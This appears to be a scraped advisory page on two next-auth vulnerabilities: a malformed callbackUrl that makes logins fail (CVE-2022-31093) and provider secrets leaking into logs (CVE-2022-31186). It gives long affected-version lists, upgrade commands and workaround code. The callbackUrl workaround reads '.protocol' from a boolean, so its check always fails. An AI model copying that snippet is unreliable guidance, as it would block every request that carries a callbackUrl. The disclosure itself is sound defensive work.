"2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

Improper Handling of `callbackUrl` parameter in next-auth

Published date: 2022-06-21T20:06:36Z
CVE: CVE-2022-31093
Links:

Impact

An attacker can send a request to an app using NextAuth.js with an invalid callbackUrl query parameter, which internally we convert to a URL object. The URL instantiation would fail due to a malformed URL being passed into the constructor, causing it to throw an unhandled error which led to our API route handler timing out and logging in to fail. This has been remedied in the following releases:

next-auth v3 users before version 3.29.5 are impacted. (We recommend upgrading to v4, as v3 is considered unmaintained. See our migration guide)

next-auth v4 users before version 4.5.0 are impacted.

Patches

We've released patches for this vulnerability in:

  • v3 - 3.29.5
  • v4 - 4.5.0

You can do:

npm i next-auth@latest

or

yarn add next-auth@latest

or

pnpm add next-auth@latest

(This will update to the latest v4 version, but you can change latest to 3 if you want to stay on v3. This is not recommended.)

Workarounds

If for some reason you cannot upgrade, the workaround requires you to rely on Advanced Initialization. Here is an example:

Before:

// pages/api/auth/[...nextauth].js
import NextAuth from "next-auth"

export default NextAuth(/* your config */)

After:

// pages/api/auth/[...nextauth].js
import NextAuth from "next-auth"

function isValidHttpUrl(url) {
  try {
    return /^https?:/.test(url).protocol
  } catch {
    return false;
  }
}

export default async function handler(req, res) {
  if (
    req.query.callbackUrl &&
    !isValidHttpUrl(req.query.callbackUrl)
  ) {
   return res.status(500).send('');
  }

  return await NextAuth(req, res, /* your config */)
}

References

This vulnerability was discovered not long after https://github.com/nextauthjs/next-auth/security/advisories/GHSA-q2mx-j4x2-2h74 was published and is very similar in nature.

Related documentation:

A test case has been added so this kind of issue will be checked before publishing. See: https://github.com/nextauthjs/next-auth/commit/e498483b23273d1bfc81be68339607f88d411bd6

For more information

If you have any concerns, we request responsible disclosure, outlined here: https://next-auth.js.org/security#reporting-a-vulnerability

Timeline

The issue was reported 2022 June 10th, a response was sent out to the reporter in less than 2 hours, and a patch was published within 3 hours.

Affected versions: ["4.4.0", "4.3.4", "4.3.3", "4.3.2", "4.3.1", "4.3.0", "4.2.1", "4.2.0", "4.1.2", "4.1.1", "4.1.0", "4.1.0-next.2", "4.1.0-next.1", "4.0.6", "4.0.5", "4.0.4", "4.0.3", "4.0.2", "4.0.1", "4.0.0", "3.29.4", "3.29.3", "3.29.1", "3.29.0", "3.28.0", "3.27.3", "3.27.2", "3.27.1", "3.27.0", "3.26.1", "3.26.0", "3.25.0", "3.24.1", "3.24.0", "3.24.0-canary.0", "3.23.3", "3.23.2", "3.23.1", "3.23.0", "3.22.0", "3.22.0-canary.2", "3.22.0-canary.1", "3.22.0-canary.0", "3.21.1", "3.21.0", "3.20.1", "3.20.0", "3.20.0-canary.7", "3.20.0-canary.6", "3.20.0-canary.5", "3.20.0-canary.4", "3.20.0-canary.3", "3.20.0-canary.2", "3.20.0-canary.1", "3.20.0-canary.0", "3.19.8", "3.19.7", "3.19.6", "3.19.6-beta.0", "3.19.5", "3.19.5-beta.0", "3.19.4", "3.19.3", "3.19.2", "3.19.1", "3.19.0", "3.18.2", "3.18.1", "3.18.0", "3.18.0-canary.1", "3.18.0-canary.0", "3.17.2", "3.17.1", "3.17.0", "3.16.1", "3.16.0", "3.15.13", "3.15.12", "3.15.11", "3.15.10", "3.15.9", "3.15.8", "3.15.7", "3.15.6", "3.15.5", "3.15.4", "3.15.1", "3.15.0", "3.15.0-beta.4", "3.15.0-beta.3", "3.15.0-beta.2", "3.15.0-beta.1", "3.14.8", "3.14.7", "3.14.6", "3.14.5", "3.14.4", "3.14.3", "3.14.2", "3.14.1", "3.14.0", "3.14.0-beta.7", "3.14.0-beta.6", "3.14.0-beta.5", "3.14.0-beta.4", "3.14.0-beta.3", "3.14.0-beta.2", "3.14.0-beta.1", "3.14.0-canary.7", "3.14.0-canary.6", "3.14.0-canary.5", "3.14.0-canary.4", "3.14.0-canary.3", "3.14.0-canary.2", "3.14.0-canary.1", "3.14.0-canary.0", "3.13.3", "3.13.2", "3.13.1", "3.13.0", "3.12.0", "3.11.2", "3.11.1", "3.11.0", "3.10.1", "3.10.0", "3.9.0", "3.8.0", "3.7.1", "3.7.0", "3.6.1", "3.6.0", "3.5.1", "3.5.0", "3.4.2", "3.4.1", "3.4.0", "3.3.1", "3.3.0", "3.3.0-canary.11", "3.3.0-canary.10", "3.3.0-canary.9", "3.3.0-canary.8", "3.3.0-canary.7", "3.3.0-canary.6", "3.3.0-canary.5", "3.3.0-canary.4", "3.3.0-canary.3", "3.3.0-canary.2", "3.3.0-canary.1", "3.2.1", "3.2.0", "3.2.0-canary.43", "3.2.0-canary.42", "3.2.0-canary.41", "3.2.0-canary.40", "3.2.0-canary.39", "3.2.0-canary.38", "3.2.0-canary.37", "3.2.0-canary.36", "3.2.0-canary.35", "3.2.0-canary.34", "3.2.0-canary.33", "3.2.0-canary.32", "3.2.0-canary.31", "3.2.0-canary.30", "3.2.0-canary.29", "3.2.0-canary.28", "3.2.0-canary.27", "3.2.0-canary.26", "3.2.0-canary.25", "3.2.0-canary.24", "3.2.0-canary.23", "3.2.0-canary.22", "3.2.0-canary.21", "3.2.0-canary.20", "3.2.0-canary.19", "3.2.0-canary.18", "3.2.0-canary.17", "3.2.0-canary.16", "3.2.0-canary.15", "3.2.0-canary.14", "3.2.0-canary.13", "3.2.0-canary.12", "3.2.0-canary.11", "3.2.0-canary.10", "3.2.0-canary.9", "3.2.0-canary.8", "3.2.0-canary.7", "3.2.0-canary.6", "3.2.0-canary.5", "3.2.0-canary.4", "3.2.0-canary.3", "3.2.0-canary.2", "3.2.0-canary.1", "3.1.0", "3.0.1", "3.0.0", "3.0.0-beta.26", "3.0.0-beta.25", "3.0.0-beta.24", "3.0.0-beta.23", "3.0.0-beta.22", "3.0.0-beta.21", "3.0.0-beta.20", "3.0.0-beta.19", "3.0.0-beta.18", "3.0.0-beta.17", "3.0.0-beta.16", "3.0.0-beta.15", "3.0.0-beta.14", "3.0.0-beta.13", "3.0.0-beta.12", "3.0.0-beta.11", "3.0.0-beta.10", "3.0.0-beta.9", "3.0.0-beta.8", "3.0.0-beta.7", "3.0.0-beta.6", "3.0.0-beta.5", "3.0.0-beta.4", "3.0.0-beta.3", "3.0.0-beta.2", "3.0.0-beta.1", "3.0.0-beta.0", "2.2.1-beta.0", "2.2.0", "2.2.0-beta.0", "2.1.0", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.1", "2.0.0", "2.0.0-beta.86", "2.0.0-beta.85", "2.0.0-beta.84", "2.0.0-beta.83", "2.0.0-beta.82", "2.0.0-beta.81", "2.0.0-beta.80", "2.0.0-beta.79", "2.0.0-beta.78", "2.0.0-beta.77", "2.0.0-beta.76", "2.0.0-beta.75", "2.0.0-beta.74", "2.0.0-beta.73", "2.0.0-beta.72", "2.0.0-beta.71", "2.0.0-beta.70", "2.0.0-beta.69", "2.0.0-beta.68", "2.0.0-beta.67", "2.0.0-beta.66", "2.0.0-beta.65", "2.0.0-beta.64", "2.0.0-beta.63", "2.0.0-beta.62", "2.0.0-beta.61", "2.0.0-beta.60", "2.0.0-beta.59", "2.0.0-beta.58", "2.0.0-beta.57", "2.0.0-beta.56", "2.0.0-beta.55", "2.0.0-beta.54", "2.0.0-beta.53", "2.0.0-beta.52", "2.0.0-beta.51", "2.0.0-beta.50", "2.0.0-beta.49", "2.0.0-beta.48", "2.0.0-beta.47", "2.0.0-beta.46", "2.0.0-beta.45", "2.0.0-beta.44", "2.0.0-beta.43", "2.0.0-beta.42", "2.0.0-beta.41", "2.0.0-beta.40", "2.0.0-beta.39", "2.0.0-beta.38", "2.0.0-beta.37", "2.0.0-beta.35", "2.0.0-beta.34", "2.0.0-beta.33", "2.0.0-beta.32", "2.0.0-beta.31", "2.0.0-beta.30", "2.0.0-beta.29", "2.0.0-beta.28", "2.0.0-beta.27", "2.0.0-beta.26", "2.0.0-beta.25", "2.0.0-beta.24", "2.0.0-beta.23", "2.0.0-beta.22", "2.0.0-beta.21", "2.0.0-beta.20", "2.0.0-beta.19", "2.0.0-beta.18", "2.0.0-beta.17", "2.0.0-beta.16", "2.0.0-beta.15", "2.0.0-beta.14", "2.0.0-beta.13", "2.0.0-beta.12", "2.0.0-beta.11", "2.0.0-beta.10", "2.0.0-beta.9", "2.0.0-beta.8", "2.0.0-beta.7", "2.0.0-beta.6", "2.0.0-beta.5", "2.0.0-beta.4", "2.0.0-beta.3", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.12.1", "1.12.0", "1.11.0", "1.10.0", "1.9.1", "1.9.0", "1.8.5", "1.8.4", "1.8.3", "1.8.2", "1.8.1", "1.8.0", "1.7.3", "1.7.2", "1.7.1", "1.7.0", "1.6.0", "1.5.1", "1.5.0", "1.4.1", "1.4.0", "1.3.0", "1.2.1", "1.1.10", "1.1.9", "1.1.8", "1.1.7", "1.1.6", "1.1.5", "1.1.3", "1.1.2", "1.1.1", "1.1.0", "1.0.0", "0.0.0-pr.3101.63594048", "0.0.0-pr.3222.41318883", "0.0.0-pr.2683.26718028", "0.0.0-manual.20446898", "0.0.0-pr.6777.16422804", "0.0.0-pr.6777.c5550344", "0.0.0-pr.1698.f3995462", "0.0.0-pr.2875.e2663860", "0.0.0-pr.3143.b2273741", "0.0.0-pr.5657.4f991076", "0.0.0-pr.2857.9c439830", "0.0.0-manual.d0952342", "0.0.0-pr.2552.dd337147", "0.0.0-pr.2552.58d56122", "0.0.0-pr.2361.f72c6565", "0.0.0-pr.3657.c2de6348", "0.0.0-pr.2829.f0df4332", "0.0.0-pr.2214.ec1f3808", "0.0.0-pr.2857.8950d346", "0.0.0-pr.2552.ec27f344", "0.0.0-pr.2857.179d0314", "0.0.0-pr.3101.01cf0d98", "0.0.0-pr.2552.4d03c090", "0.0.0-pr.7056.f991df89", "0.0.0-pr.3143.367c8e88", "0.0.0-pr.2325.c9308d84", "0.0.0-pr.2361.f3784c70", "0.0.0-pr.5442.f1124f60", "0.0.0-pr.2884.7d74de57", "0.0.0-pr.2552.8de94d45", "0.0.0-pr.7056.1fefd037", "0.0.0-pr.2552.31684d31", "0.0.0-pr.5000.d742df31", "0.0.0-pr.2862.59712c27", "0.0.0-pr.3140.e6839f23", "0.0.0-pr.11562.ed0fce23", "0.0.0-pr.2518.f6892e15", "0.0.0-pr.2842.ccf36f15", "0.0.0-pr.3142.7d257c15", "0.0.0-pr.3307.e9e46c15", "0.0.0-pr.3657.56c042d8", "0.0.0-pr.3657.1ce622f7", "0.0.0-pr.6777.7f1745f6", "0.0.0-pr.2857.c98979e5", "0.0.0-pr.2932.3e8c32f4", "0.0.0-pr.3832.0245f6c4", "0.0.0-pr.4769.fc4d07d3", "0.0.0-pr.2900.3f27f1d2", "0.0.0-pr.3101.14f215f1", "0.0.0-pr.3657.433167c1", "0.0.0-pr.2214.f5461d1f", "0.0.0-pr.2236.76c76f8c", "0.0.0-pr.1698.d16e2ddc", "0.0.0-pr.2388.ce5443cf", "0.0.0-pr.2361.34ee1e9e", "0.0.0-pr.2552.01dc565f", "0.0.0-pr.2682.198c077f", "0.0.0-pr.2829.6e10635e", "0.0.0-pr.2857.8c54020d", "0.0.0-pr.2932.50df98dc", "0.0.0-pr.3101.54efdeff", "0.0.0-pr.3101.52507ff0", "0.0.0-pr.2875.e07f9f4e", "0.0.0-pr.3657.e822786c", "0.0.0-pr.5442.d62475d0", "0.0.0-pr.4769.4d126ded", "0.0.0-pr.5745.7387139f", "0.0.0-pr.4769.e8de64ec", "0.0.0-pr.5984.0593f75c", "0.0.0-pr.5991.5c72424c", "0.0.0-pr.6132.47cee00f", "0.0.0-pr.7214.4142955d", "0.0.0-pr.4760.0b190842", "0.0.0-pr.3886.65b88464", "0.0.0-pr.3101.5bf71011", "0.0.0-pr.4769.3ba67573", "0.0.0-pr.5792.6b041161", "0.0.0-pr.5802.b9d39079", "0.0.0-pr.4757.5ac99859", "0.0.0-pr.2552.f3ab7686", "0.0.0-pr.2552.90b06885", "0.0.0-pr.4760.bd6c5394", "0.0.0-pr.2361.bb96a914", "0.0.0-pr.4970.bffda880", "0.0.0-pr.3101.a0a0b745", "0.0.0-pr.5753.2b78e705", "0.0.0-pr.2361.b6d0d634", "0.0.0-pr.3402.be5db520", "0.0.0-pr.2388.9cbca279", "0.0.0-pr.2848.76fbc129", "0.0.0-pr.4841.8befe102", "0.0.0-pr.2295.231aeb99", "0.0.0-pr.2942.6db13e97", "0.0.0-manual.5749b095", "0.0.0-pr.4760.d7288b88", "0.0.0-pr.5536.126b3a88", "0.0.0-manual.d211b087", "0.0.0-manual.b7162c86", "0.0.0-pr.2236.a8bf7d85", "0.0.0-pr.2552.d1b14b85", "0.0.0-pr.4769.07ba2c72", "0.0.0-pr.3648.05a6bc62", "0.0.0-manual.c8300b61", "0.0.0-pr.2552.86b46d57", "0.0.0-pr.3402.5fb1fb51", "0.0.0-pr.2857.7b3cd038", "0.0.0-pr.2767.f9d46b34", "0.0.0-pr.3141.0a0bc030", "0.0.0-pr.2552.07b5be17", "0.0.0-pr.2682.10a4ba14", "0.0.0-pr.2980.c0b78cd9", "0.0.0-manual.722c34b9", "0.0.0-pr.1698.708f4bf8", "0.0.0-pr.2857.acc78bf8", "0.0.0-pr.3101.fb56f6e8", "0.0.0-pr.3101.8ff8bdb8", "0.0.0-manual.f2c23db8", "0.0.0-pr.2552.27134bf7", "0.0.0-pr.3657.4e42b8a7", "0.0.0-pr.7056.ced446b7", "0.0.0-manual.cfb42ae7", "0.0.0-pr.2552.cf147fb6", "0.0.0-pr.7056.c0e491b6", "0.0.0-manual.024ba3e6", "0.0.0-pr.3514.ebb48bc5", "0.0.0-pr.4769.4bfe67f4", "0.0.0-pr.2411.0f8b51b3", "0.0.0-manual.83c4ebd1", "0.0.0-pr.2361.beca4a3f", "0.0.0-pr.2361.ee80cbbc", "0.0.0-pr.2518.7bdfc7da", "0.0.0-pr.2552.ab7a548e", "0.0.0-pr.2552.691ac07b", "0.0.0-pr.2295.bb8bb1ad", "0.0.0-pr.2682.bb1972ba", "0.0.0-pr.2717.06130bef", "0.0.0-pr.2821.192d7c9b", "0.0.0-pr.2717.029b91cf", "0.0.0-pr.2857.b44ca26c", "0.0.0-pr.2857.3b0351cb", "0.0.0-pr.3188.f68451bc", "0.0.0-pr.3188.74bc611f", "0.0.0-pr.3101.f2dcbb5b", "0.0.0-pr.3402.16a9ebfc", "0.0.0-pr.3415.e9590dcb", "0.0.0-pr.3446.476d780b", "0.0.0-pr.3648.44003b1e", "0.0.0-pr.3657.4157bfde", "0.0.0-pr.3657.ce9386bb", "0.0.0-pr.3783.db8ceb0d", "0.0.0-pr.3657.d29a61eb", "0.0.0-pr.3657.ab442e4d", "0.0.0-pr.3799.b9241d4a", "0.0.0-pr.3804.dba9889e", "0.0.0-pr.4941.b97ce6de", "0.0.0-pr.5000.d16b25dc", "0.0.0-pr.5000.adbbf3df", "0.0.0-pr.5745.db70f12d", "0.0.0-pr.6007.2e864d9b", "0.0.0-pr.6004.b96e4fbf", "0.0.0-pr.7056.1fdbd15f", "0.0.0-manual.b53ca00b", "0.0.0-manual.27bcf0fe", "0.0.0-manual.4c69001b", "0.0.0-manual.dacbe24d", "0.0.0-pr.3217.87a21677", "0.0.0-manual.ffd05533", "0.0.0-pr.2552.4a2d5099", "0.0.0-pr.4704.768a1433", "0.0.0-pr.4774.a31ef368", "0.0.0-pr.2411.8ca1f299", "0.0.0-pr.3649.27d8aa99", "0.0.0-pr.3657.642da092", "0.0.0-pr.1698.16a0ea86", "0.0.0-manual.7f41a086", "0.0.0-pr.2361.2f293a83", "0.0.0-pr.3101.a410dc81", "0.0.0-pr.3307.80f2af80", "0.0.0-pr.5792.9119ea67", "0.0.0-pr.7056.4708af34", "0.0.0-pr.2236.34ce1a28", "0.0.0-pr.3657.f1addc18", "0.0.0-manual.2824fa11", "0.0.0-pr.4769.0a576d10", "0.0.0-pr.5442.0c96da09", "0.0.0-pr.2552.7af698f7", "0.0.0-pr.2552.735c10a7", "0.0.0-pr.2875.6dc651a7", "0.0.0-pr.3784.6c986ac7", "0.0.0-pr.3101.7983f7a6", "0.0.0-pr.3648.f1ad5ec6", "0.0.0-pr.5556.ac098ce6", "0.0.0-pr.2361.d70a43d5", "0.0.0-pr.2552.f73a37a5", "0.0.0-pr.4769.e7e82aa5", "0.0.0-manual.4cd21ea5", "0.0.0-manual.f414f2f5", "0.0.0-pr.5000.fa94eef4", "0.0.0-pr.2214.a71ac3f3", "0.0.0-pr.2361.46a85ea3", "0.0.0-pr.2256.d61437a2", "0.0.0-pr.3886.93a266e2", "0.0.0-semantically-released", "0.0.0-pr.2214.e085efae", "0.0.0-pr.2236.e9a1675e", "0.0.0-pr.2361.a780908a", "0.0.0-pr.2552.d227a1aa", "0.0.0-pr.2552.af41912d", "0.0.0-pr.2857.9a95448e", "0.0.0-pr.2857.5225a3ef", "0.0.0-pr.2857.5130374a", "0.0.0-pr.3100.1ae9acd0", "0.0.0-pr.3101.3d58a27e", "0.0.0-pr.3288.14260eda", "0.0.0-pr.4003.e7e3e60a", "0.0.0-pr.4760.fa6189ff", "0.0.0-pr.4940.437d4e8a", "0.0.0-pr.4926.25a4fa9f", "0.0.0-pr.4970.6ae1561c", "0.0.0-pr.5763.5e81d58a", "0.0.0-pr.6004.7d354a3a", "0.0.0-pr.6007.27c9acfe", "0.0.0-pr.6029.8f267aea", "0.0.0-pr.6777.faa4ea2a", "0.0.0-pr.6777.ae645ec0", "0.0.0-pr.7214.998286da", "0.0.0-manual.e65faa1c", "0.0.0-manual.68f7ce1c", "0.0.0-manual.c885ac1d", "0.0.0-pr.8775.a98a849e", "0.0.0-manual.7264de5f"]
Secure versions: [4.24.12, 4.24.13, 5.0.0-beta.30]
Recommendation: Update to version 4.24.13.

next-auth before v4.10.2 and v3.29.9 leaks excessive information into log

Published date: 2022-08-06T05:29:45Z
CVE: CVE-2022-31186
Links:

Impact

An information disclosure vulnerability in next-auth before v4.10.2 and v3.29.9 allows an attacker with log access privilege to obtain excessive information such as an identity provider's secret in the log (which is thrown during OAuth error handling) and use it to leverage further attacks on the system, like impersonating the client to ask for extensive permissions.

Patches

We patched this vulnerability in v4.10.2 and v3.29.9 by moving the log for provider information to the debug level. In addition, we added a warning for having the debug: true option turned on in production and documented it here.

You have enabled the debug option. It is meant for development only, to help you catch issues in your authentication flow and you should consider removing this option when deploying to production. One way of only allowing debugging while not in production is to set debug: process.env.NODE_ENV !== production, so you can commit this without needing to change the value.

If you want to log debug messages during production anyway, we recommend setting the logger option with proper sanitization of potentially sensitive user information.

To upgrade:

npm i next-auth@latest
# or
yarn add next-auth@latest
# or
pnpm add next-auth@latest

(This will update to the latest v4 version, but you can change latest to 3 if you want to stay on v3. This is not recommended. v3 is unmaintained.)

Workarounds

If for some reason you cannot upgrade, you can user the logger configuration option by sanitizing the logs: ts // Example import log from "your-logging-service" export const authOptions: NextAuthOptions = { debug: process.env.NODE_ENV !== "production", logger: { error: (code, metadata) => { if (!(metadata instanceof Error) && metadata.provider) { // redact the provider secret here delete metadata.provider log.error(code, metadata) } else { log.error(code, metadata) } } }, }

References

Related documentation: - https://next-auth.js.org/warnings#debug_enabled - https://next-auth.js.org/configuration/options#logger - https://next-auth.js.org/getting-started/upgrade-v4

For more information

